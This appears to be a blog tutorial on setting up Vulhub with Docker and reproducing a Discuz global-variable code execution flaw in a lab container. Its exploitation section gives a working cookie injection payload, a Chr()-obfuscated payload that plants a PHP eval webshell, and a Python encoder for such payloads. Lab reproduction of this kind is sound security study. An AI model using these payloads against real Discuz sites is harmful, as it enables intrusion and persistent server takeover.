Fading Coder

One Final Commit for the Last Sprint

Home > Tech > Content

Deploying Vulhub Security Environments and Demonstrating Discuz Code Execution

Tech May 19 1

Environment Configuration

Vulhub offers a streamlined platform for security professionals to reproduce vulnerabilities using Docker containners. It eliminates the need for complex setup procedures, allowing researchers to focus on exploit analysis.

System Requirements:

  • Host Machine: Windows 10
  • Guest VM: CentOS 7 (IP: 192.168.1.13, Network Adapter: NAT)

Container Runtime Setup

1. Install Docker Engine

Retrieve and execute the installation script configured with an Alibaba Cloud mirror:

curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun

2. Install Docker Compose

Select one of the following installation methods:

Method A: Binary Installation Download the latest Linux binary (docker-compose-Linux-x86_64), place it in /usr/local/bin, and apply executable permissions:

mv docker-compose-Linux-x86_64 /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
docker-compose version

Method B: Python Pip Install via pip after ensuring dependencies are present:

yum -y install epel-release python-pip
pip install docker-compose
pip --version

Note: If experiencing timeout errors during pip installation, configure a domestic repository index.

3. Deploy Vulhub Repository

Choose between downloading a release package or cloning the Git repository:

Git Clone

yum install -y git
git clone https://github.com/vulhub/vulhub.git

Archive Extraction

mkdir vulhub && cd vulhub
unzip master.zip

4. Accelerate Image Pulling (Optional)

Configure daemon.json to utilize the AliCloud container mirror accelerator:

sudo mkdir -p /etc/docker
echo '{"registry-mirrors": ["your-accelerator-url"]}' | sudo tee /etc/docker/daemon.json
sudo systemctl daemon-reload
sudo systemctl restart docker

Accessing Vulnerability Instances

To interact with services running inside the virtual machine from the physical host, static routing must be established to forward traffic destined for Docker internal networks through the VM gateway.

Route Configuration

  1. Identify Container IP: Determine the private IP assigned to the vulnerable container.

    docker inspect <container_id> | grep IPAddress
# Example Output: "IPAddress": "172.18.0.3"

  2. Disable Firewall on VM: Ensure local firewall rules do not block incoming connections.

    systemctl stop firewalld.service

  3. Add Static Route on Host: Open Command Prompt as Administrator on Windows and add a persistent route.

    route add -p 172.18.0.0 mask 255.255.0.0 192.168.1.13
route print

Vulnerability Reproduction

This section demonstrates the exploitation of the Discuz vulnerability (wooyun-2010-080723) involving global variable bypass leading to code execution.

Deployment

Navigate to the specific environment directory within the repository:

cd vulhub/discuz/wooyun-2010-080723/

Optionally modify docker-compose.yml to adjust exposed ports or default credentials.

Initialize the environment:

docker-compose up -d

Observe the output to verify the started service ports (e.g., 8080->80/tcp).

Exploitation Steps

Database Initialization

Access the installation wizard at http://<IP>:<Port>/install/. Use the following configuration:

  • Database Host: db
  • Database Name: discuz
  • User: root
  • Password: root

Complete the initial setup by skipping contact information input. This redirects to the forum homepage.

Remote Code Execution

Capture HTTP requests using a proxy tool (e.g., Burp Suite). Navigate to a thread post to generate traffic. Modify the Cookie header with the following payload to trigger PHP evaluation:

GET /viewthread.php?tid=13&extra=page%3D1 HTTP/1.1
Host: 172.18.0.3
Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
... (remaining headers) ...

Sending this request will render the phpinfo() output, confirming code injection capability.

Establish Persistence

Inject a webshell by modifying the cookie values to write arbitrary PHP content. The target file is x.php with a POST parameter key of pwd.

Payload structure:

GLOBALS[_DCACHE][smilies][replacearray]=eval(Chr(102).Chr(112).Chr(117).Chr(116).Chr(115).Chr(40).Chr(102).Chr(111).Chr(112).Chr(101).Chr(110).Chr(40).Chr(39).Chr(120).Chr(46).Chr(112).Chr(104).Chr(112).Chr(39).Chr(44).Chr(39).Chr(119).Chr(39).Chr(41).Chr(44).Chr(39).Chr(60).Chr(63).Chr(112).Chr(104).Chr(112).Chr(32).Chr(64).Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(80).Chr(83).Chr(84).Chr(91).Chr(112).Chr(119).Chr(100).Chr(93).Chr(41).Chr(63).Chr(62).Chr(39).Chr(41).Chr(59))

Accessing http://<IP>:<Port>/x.php and sending POST data successfully activates the shell.

Utility Scripts

A conversion utility aids in transforming text payloads into ASCII character sequences required for obfuscated exploits.

import re

# Converts numeric ASCII codes to characters
def string_from_ascii(encoded_chars):
    for c in re.findall(r"(\d+)", encoded_chars):
        print(chr(int(c)), end="")

# Converts characters to Chr() format
def ascii_from_string(text):
    ascii_sequence = ""
    for char in text:
        ascii_sequence += "Chr(" + str(ord(char)) + ")."
    print(ascii_sequence)

# Example usage
encoded_payload = "Chr(102).Chr(112).Chr(117)..."
string_from_ascii(encoded_payload)

decoded_payload = "fputs(fopen('x.php','w'),'<?php @eval($_POST[pwd])?>');"
ascii_from_string(decoded_payload)

Maintenance and Troubleshooting

Cleanup

Remove all resources associated with a specific environment by executing the down command within the project directory:

docker-compose down

Force removal of images and volumes if necessary:

docker-compose down --rmi all -v

Verify running containers are stopped:

docker ps

Common Issues

DNS Resolution Failure If curl reports Could not resolve host, update the resolver configuration:

vim /etc/resolv.conf
# nameserver 223.5.5.5

Docker Daemon Unreachable Check and start the service manually:

service docker status
service docker start

Pip Timeout Errors Switch the pip index URL to a domestic mirror:

mkdir ~/.pip/
cd ~/.pip/
vim pip.conf

[global]
index-url=https://mirrors.aliyun.com/pypi/simple/

Static Route Removal To delete the previously added permanent route:

route delete 172.18.0.0
Tags: vulhubdockersecurity-researchdiscuz
Back to List

Prev: MySQL Index Types and Implementation Details

Next: Mastering C++ Constructors and Function Mechanics

Related Articles

Understanding Strong and Weak References in Java

Strong References Strong reference are the most prevalent type of object referencing in Java. When an object has a strong reference pointing to it, the garbage collector will not reclaim its memory. F...

Comprehensive Guide to SSTI Explained with Payload Bypass Techniques

Introduction Server-Side Template Injection (SSTI) is a vulnerability in web applications where user input is improper handled within the template engine and executed on the server. This exploit can r...

Implement Image Upload Functionality for Django Integrated TinyMCE Editor

Django’s Admin panel is highly user-friendly, and pairing it with TinyMCE, an effective rich text editor, simplifies content management significantly. Combining the two is particular useful for bloggi...

Leave a Comment

Anonymous

◎Feel free to join the discussion and share your thoughts.

Copyright © fadingcoder.top